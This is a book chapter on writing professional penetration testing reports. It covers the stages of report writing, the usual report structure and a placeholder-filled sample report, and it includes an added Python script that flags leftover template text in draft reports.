4. How do you check for sensitive data exposure in local storage? 


CHAPTER 12 
Reporting 


Introduction 


We have finally reached the final chapter. Congratulations! You have completed reading the 
entire book. But before we can rejoice, we need to address one of the most crucial aspects of a 
wireless penetration test: how to write a professional wireless penetration testing report. 


Structure 


The following topics will be covered in this chapter: 


• Report writing 
• Report writing stages 
• Penetration testing report sample 


Objectives 


In this chapter, you will be able to understand how to write a professional penetration testing 
report. 


Report writing 


Writing a report for a penetration test involves many different tasks, including methodology, 
processes, a correct description of the report’s content and design, a thorough example of the 
report, and the tester’s own experiences. When the report is finished, it is distributed to the 
technical team and senior management of the target firms. This report is used as a guide if any 
future needs of this nature arise. 


Report writing stages 


Writing a penetration report involves extensive writing, which is divided into the following 
stages, as further illustrated in Figure 12.1: 


• Report planning 
• Information collection 
• Writing the first draft 
• Review and finalization 


[Figure: the four report writing stages (Report Planning, Information Collection, Writing the 
First Draft, Review and Finalization) shown as a cycle] 


Figure 12.1: Report writing stages 


Report planning 


Planning a report begins with the objectives, which aid readers in comprehending the key 
findings of the penetration testing. This section explains the purpose of the testing, the 
advantages of pen testing, and so on. Second, the time needed for testing is included in the report 
planning process. 


Major elements of report writing are as follows: 


Objectives: It explains the general goal and advantages of pen testing. 


Time: The inclusion of time is crucial because it provides the system’s actual status. 
Imagine that this report will protect the tester if something goes wrong later because it 
will show the risks and vulnerabilities present in the penetration testing scope at the time 
in question. 


Target audience: Target audiences such as information security managers, information 
technology managers, the chief information security officer, and the technical team should 
also be included in pen testing reports. 


Report classification: It needs to be appropriately classified because it contains highly 
secret information such as server IP addresses, application details, vulnerabilities, and 
threats. However, the target organization’s information categorization policy must be 
taken into consideration while classifying the information. 


Report distribution: The number of copies and report distribution should be mentioned 
in the scope of the work. It also needs to mention that the hardcopies can be controlled by 
printing a limited number of copies attached with their number and the receiver’s name. 


Information collection 


Pen testers must list each step to ensure that they have gathered all the information at all testing 
stages because the procedures are intricate and time-consuming. Along with the methodologies, 
they must also provide the tools and systems, scan results, vulnerability analyses, specifics of 
their discoveries, and so on. 


Writing the first draft 


Once the tester is equipped with the necessary resources, they must begin writing the first draft. 
The first draft should be composed in great detail, including all of the activities, procedures, 
and experiences. 


Review and finalization 


The report must be examined after it has been written, first by the drafter and then by any 
mentors or colleagues who may have helped. It is required of the reviewer to go through the 
report in depth and look for any errors that need to be fixed. 
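As an added example (not from the book), the following Python check supports the review stage: before a draft is sent to the client, it flags template placeholders in the <CLIENT NAME> style used by the sample report later in this chapter, leftover filler text, template notes, and masked values such as XXXX. The draft text it scans is constructed inline, and the placeholder conventions it looks for are an assumption taken from that sample.

```python
"""Pre-distribution check for a penetration testing report draft.

Added example, not from the book. A report leaves the reviewer's hands with
the client's name, dates and vulnerability counts filled in; this script
lists every place where template content survived into the draft. The
patterns are assumptions matching the sample report's conventions
(<CLIENT NAME>, Lorem ipsum, TEMPLATE NOTE, XXXX).
"""
import re

CHECKS = [
    ("placeholder", re.compile(r"<[^<>\n]+>")),      # <CLIENT NAME>, <TEST DATE>, <NUM> ...
    ("filler-text", re.compile(r"\bLorem ipsum\b", re.I)),
    ("template-note", re.compile(r"\bTEMPLATE NOTE\b")),
    ("masked-value", re.compile(r"\bX{3,}\b")),     # e.g. "the XXXX application"
]


def check_report(text):
    """Return a list of (line_number, kind, matched_text) for every leftover found."""
    issues = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for kind, pattern in CHECKS:
            for match in pattern.finditer(line):
                issues.append((lineno, kind, match.group(0)))
    return issues


def summarize(issues):
    """Count issues per kind, which is what a reviewer wants in the first pass."""
    counts = {}
    for _, kind, _ in issues:
        counts[kind] = counts.get(kind, 0) + 1
    return counts


def is_ready_for_distribution(text):
    """True only when no leftover template content remains."""
    return not check_report(text)


# Constructed draft fragment; the team name, date and network are made up.
SAMPLE_DRAFT = """\
2024 Penetration Testing Report Prepared For <CLIENT NAME>
Report Issued: 2024-03-01
Acme Security identified a total of <VULN TOTAL NUM> vulnerabilities.
Analysis: Lorem ipsum dolor sit amet, consectetur adipiscing elit.
A fake customer account in the XXXX application.
TEMPLATE NOTE: (Sorting by descending risk score)
Remediation: disable SMBv1 on 10.0.1.0/24 hosts.
"""

if __name__ == "__main__":
    for lineno, kind, snippet in check_report(SAMPLE_DRAFT):
        print("line %d: %s: %s" % (lineno, kind, snippet))
    print("ready:", is_ready_for_distribution(SAMPLE_DRAFT))
```

Run it over the exported text of the report (or each section as it is drafted) and treat a non-empty result as a blocker for distribution; a leftover placeholder in a classified deliverable is both an embarrassment and, in the case of scope or credential tables, a correctness problem.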


Content of penetration testing report 


The typical order format of a penetration testing report is as follows: 


• Executive summary 
    o Scope of work 
    o Project objectives 
    o Assumption 
    o Timeline 
    o Summary of findings 
    o Summary of recommendation 
• Methodology 
    o Planning 
    o Exploitation 
    o Reporting 
• Detail findings 
    o Detailed systems information 
    o Windows server information 
• References 
    o Appendix 


Penetration testing report sample 


This section illustrates the different pages within a penetration testing report sample. 


1. Page 1 is illustrated in Figure 12.2: 


<TEAM LOGO/NAME> 


<YEAR> Penetration Testing 
Report Prepared For 


<REPLACE WITH CLIENT LOGO - CHANGE COLORS TOO> 


Report Issued: <TEST DATE> 


Sensitive: The information in this document is strictly confidential and is intended for <COMPANY NAME> 


Figure 12.2: Penetration testing report Page 1 


2. Page 2 is illustrated in Figure 12.3: 


Confidentiality Notice 


This report contains sensitive, privileged, and confidential information. Precautions should be 
taken to protect the confidentiality of the information in this document. Publication of this report 
may cause reputational damage to <CLIENT NAME> or facilitate attacks against <CLIENT 
NAME>. <TEAM NAME> shall not be held liable for special, incidental, collateral or 
consequential damages arising out of the use of this information. 


Disclaimer 


Note that this assessment may not disclose all vulnerabilities that are present on the systems 
within the scope of the engagement. This report is a summary of the findings from a "point-in-
time" assessment made on <CLIENT NAME>'s environment. Any changes made to the 
environment during the period of testing may affect the results of the assessment. 


3. Page 3 is illustrated in Figure 12.4: 


TABLE OF CONTENTS 


EXECUTIVE SUMMARY 
<Optional - Big Issue> Recommendation 


HIGH LEVEL ASSESSMENT OVERVIEW 
Observed Security Strengths 
Areas for Improvement 
Short Term Recommendations 
Long Term Recommendations 


SCOPE 
Networks 
Other 
Provided Credentials 


TESTING METHODOLOGY 


CLASSIFICATION DEFINITIONS 
Risk Classifications 
Exploitation Likelihood Classifications 
Business Impact Classifications 
Remediation Difficulty Classifications 


ASSESSMENT FINDINGS 
APPENDIX A - TOOLS USED 


APPENDIX B - ENGAGEMENT INFORMATION 
Client Information 
Version Information 
Contact Information 
4. Page 4 is illustrated in Figure 12.5: 


<TEAM NAME> performed a security assessment of the internal corporate network of <CLIENT 
NAME> on <TEST DATE>. <TEAM NAME>'s penetration test simulated an attack from an 
external threat actor attempting to gain access to systems within the <CLIENT NAME> 
corporate network. The purpose of this assessment was to discover and identify vulnerabilities 
in <CLIENT NAME>'s infrastructure and suggest methods to remediate the vulnerabilities. 
<TEAM NAME> identified a total of <VULN TOTAL NUM> vulnerabilities within the scope of the 
engagement, which are broken down by severity in the table below. 


CRITICAL 


The highest severity vulnerabilities give potential attackers the opportunity to <BAD ACTIONS 
THAT COULD OCCUR HERE - FULL PARAGRAPH WITH HIGH-LEVEL DETAIL>. In order to 
ensure data confidentiality, integrity, and availability, security remediations should be 
implemented as described in the security assessment findings. 


Note that this assessment may not disclose all vulnerabilities that are present on the systems 
within the scope. Any changes made to the environment during the period of testing may affect 
the results of the assessment. 


<Optional - Big Issue> Recommendation 


This is an optional paragraph that discusses a very critical series of business failures (e.g. 
failure to adhere to applicable legal regulations) that isn't a technical vulnerability but still should 
be brought to the attention of the executive team. 
5. Page 5 is illustrated in Figure 12.6: 


HIGH LEVEL ASSESSMENT OVERVIEW 


Observed Security Strengths 


<TEAM NAME> identified the following strengths in <CLIENT NAME>'s network which greatly 
increase the security of the network. <CLIENT NAME> should continue to monitor these 
controls to ensure they remain effective. 
<Strength Category> 
• Great thing we saw here that causes us issues (which is a good thing) 
• Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor 
incididunt ut labore et dolore magna aliqua. 


Areas for Improvement 


<TEAM NAME> recommends <CLIENT NAME> takes the following actions to improve the 
security of the network. Implementing these recommendations will reduce the likelihood that an 
attacker will be able to successfully attack <CLIENT NAME>'s information systems and/or 
reduce the impact of a successful attack. 


Short Term Recommendations 

<TEAM NAME> recommends <CLIENT NAME> take the following actions as soon as possible 
to minimize business risk. 

<Recommendation Category> 


« <Individual Recommendation> 
¢« Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor 
incididunt ut labore et dolore magna aliqua. 


Long Term Recommendations 


<TEAM NAME> recommends the following actions be taken over the next <NUM> months to fix 
hard-to-remediate issues that do not pose an urgent risk to the business. 
6. Page 6 is illustrated in Figure 12.7: 


<Recommendation Category> 


• <Individual Recommendation> 
• Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor 
incididunt ut labore et dolore magna aliqua. 


7. Page 7 is illustrated in Figure 12.8: 


SCOPE 


All testing was based on the scope as defined in the Request For Proposal (RFP) and official 
written communications. The items in scope are listed below. 


Networks 


Network | Note 
10.0.1.0/24 | Network for Corporate HQ 
10.0.2.0/24 | Gotham, NY, branch site 


Other 


Name | System Type | Note 


Provided Credentials 


<CLIENT NAME> provided <TEAM NAME> with the following credentials and access to 
facilitate the security assessment listed below. 


Item | Note 
Customer Account (testuser@example.com) | A fake customer account in the XXXX 
application for testing functionality that requires authentication. 
IVR Testing Phone (555-555-5678) | Specific phone to use for IVR system testing. 


<CLIENT NAME> CONFIDENTIAL Page 7 


Figure 12.8: Penetration testing report Page 7 


8. Page 8 is illustrated in Figure 12.9: 


TESTING METHODOLOGY 


<TEAM NAME GOES HERE>'s testing methodology was split into three phases: 
Reconnaissance, Target Assessment, and Execution of Vulnerabilities. During reconnaissance, 
we gathered information about <CLIENT NAME>'s network systems. <TEAM NAME GOES 
HERE> used port scanning and other enumeration methods to refine target information and 
assess target values. Next, we conducted our targeted assessment. <TEAM NAME GOES 
HERE> simulated an attacker exploiting vulnerabilities in the <CLIENT NAME> network. 
<TEAM NAME GOES HERE> gathered evidence of vulnerabilities during this phase of the 
engagement while conducting the simulation in a manner that would not disrupt normal 
business operations. 


The following image is a graphical representation of this methodology. 


[Figure: team methodology diagram. Phase labels recoverable from the image: Planning (plan 
workflow, establish scope, research targets); Target Acquisition (network scanning, OS 
fingerprinting, service identification); Pre-Exploitation; Post Exploitation (escalate 
privileges); Documentation (evidence collection, analysis of findings, presentation of 
findings). Further items read: enumerate users, compromise credentials, establish system 
access.] 


9. Page 9 is illustrated in Figure 12.10: 


CLASSIFICATION DEFINITIONS 


Risk Classifications 


Risk | Description 


The vulnerability poses an immediate threat to the organization. Successful exploitation may 
permanently affect the organization. Remediation should be immediately performed. 


The vulnerability poses an urgent threat to the organization, and remediation should be 
prioritized. 


Successful exploitation is possible and may result in notable disruption of business 
functionality. This vulnerability should be remediated when feasible. 


The vulnerability poses a negligible/minimal threat to the organization. The presence of this 
vulnerability should be noted and remediated if possible. 


Informational | These findings have no clear threat to the organization, but may cause business 
processes to function differently than desired or reveal sensitive information about the company. 


Exploitation Likelihood Classifications 


Likelihood | Description 


Exploitation methods are well-known and can be performed using publicly available tools. 
Low-skilled attackers and automated tools could successfully exploit the vulnerability with 
minimal difficulty. 


Exploitation methods are well-known, may be performed using public tools, but require 
configuration. Understanding of the underlying system is required for successful exploitation. 


Exploitation requires deep understanding of the underlying systems or advanced technical 
skills. Precise conditions may be required for successful exploitation. 


10. Page 10 is illustrated in Figure 12.11: 


Business Impact Classifications 


Impact | Description 


Successful exploitation may result in large disruptions of critical business functions across the 
organization and significant financial damage. 


Successful exploitation may cause significant disruptions to non-critical business functions. 


Successful exploitation may affect few users, without causing much disruption to routine 
business functions. 


Remediation Difficulty Classifications 


Difficulty | Description 


Remediation may require extensive reconfiguration of underlying systems that is time 
consuming. Remediation may require disruption of normal business functions. 


Remediation may require minor reconfigurations or additions that may be time-intensive or 
expensive. 


Remediation can be accomplished in a short amount of time, with little difficulty. 


11. Page 11 is illustrated in Figure 12.12: 


ASSESSMENT FINDINGS 


Number Finding Risk Score 


TEMPLATE NOTE: (Sorting by descending risk score) 


12. Page 12 is illustrated in Figure 12.13: 


1 - Example Vulnerability Finding 


HIGH RISK (8/10) 


Security Implications 
This is where you give a 1-2 sentence description about the major impact of the finding. This 
finding is very important because it can destroy the entire business if left unchecked. 


Analysis 

Longer discussion of the finding. Includes screenshots. Lorem ipsum dolor sit amet, consectetur 
adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad 
minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo 
consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat 
nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt 
mollit anim id est laborum (see Appendix 1). 


[Figure screenshot: source listing of the PHP webshell found during the assessment; the 
garbled OCR text of the script is not reproduced here] 


Figure 2.3.1: A php webshell uploaded to XYZ Application 


13. Page 13 is illustrated in Figure 12.14: 


Recommendations 
• Remove XYZ to make things more secure 
• If you can not remove XYZ do this... 


References (opt) 


• https://github.com/Sevaarcen/RADARAree/master/radariplaybooks 
• https://owasp.org/www-project-top-ten/ 


14. Page 14 is illustrated in Figure 12.15: 


APPENDIX A - TOOLS USED 


TOOL | DESCRIPTION 


BurpSuite Community Edition | Used for testing of web applications. 
(tool name not captured) | Used for exploitation of vulnerable services and vulnerability scanning. 
nmap | (description not captured) 
(tool name not captured) | Used to scan the networks for vulnerabilities. 
PostgreSQL Client Tools | Used to connect to the PostgreSQL server. 


Table A.1: Tools used during assessment 


15. Page 15 is illustrated in Figure 12.16: 


APPENDIX B - ENGAGEMENT INFORMATION 


Client Information 


Primary Contact | <Person Name>, <Person's Title> 


Approvers | The following people are authorized to change the scope of engagement and modify 
the terms of the engagement: 
• <PERSON NAME 1> 
• <PERSON NAME 2> 


Version Information 


Version Date Description 


Contact Information 


Name | <TEAM NAME> Consulting 
1001 Fake Street, Gotham, NY 11201 


Email | <REPLACE WITH PROVIDED EMAIL> 


Conclusion 


In this chapter, we went over how to plan a report and how to write one from scratch. It can be 
difficult to write a report at times, but once you get the feel of it, you will write reports like a 
professional. 


It is my responsibility as the author to give you, my reader, the finest possible reading 
experience. So now it is time for you! What do you think of this book? Have you learned more 
than you expected? Was it too complicated or difficult to understand? Did it not offer enough 
practical examples? Did it seem to you that something was left out? Please feel free to contact 
me through the https://www.bpbonline.com page of BPB Online. See you on the other side! 